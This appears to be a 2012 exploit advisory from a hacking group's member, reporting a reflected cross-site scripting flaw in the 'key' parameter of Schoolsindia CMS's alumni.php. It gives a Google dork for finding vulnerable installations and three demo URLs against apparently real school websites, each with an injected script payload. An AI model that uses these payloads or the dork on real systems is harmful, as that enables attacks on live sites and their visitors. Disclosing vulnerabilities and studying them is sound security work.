<!-- ________ .__ __________________ \_ ___ \_______|__| _____ \_____ \______ \ / \ \/\_ __ \ |/ \ _(__ <| _/ \ \____| | \/ | Y Y \/ \ | \ \______ /|__| |__|__|_| /______ /____|_ / \/ \/ \/ \/ --> # Exploit Title: Schoolsindia cms Cross site Scripting Vulnerability # # Google Dork: Intext:"Powered by Schoolsindia" # # Date: 08/29/2012 # # Author: Crim3R # # Site : Http://Ajaxtm.com/ # # Vendor Home : http://www.schoolsindia.com/ # # Tested on: all # ================================== [+] key parametr in alumni.php is Vulnerable to xss [+] alumni.php?id=&key=[htmlcode]&max=[number]&pageno=[number] D3m0: http://apsbeas.org/alumni.php?id=&key="><script>alert(0);</script>&max=10&pageno=2 http://dpsmbd.com/alumni.php?id=&key="><script>alert(0);</script>&max=10&pageno=2 http://www.stmarysmbd.com/alumni.php?id=&key="><script>alert(0);</script>&max=10&pageno=2 ===============Crim3R@Att.Net========= [+] Greetz to All Ajaxtm Security Member Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal devilzc0der - Dominator - Hossein.R1369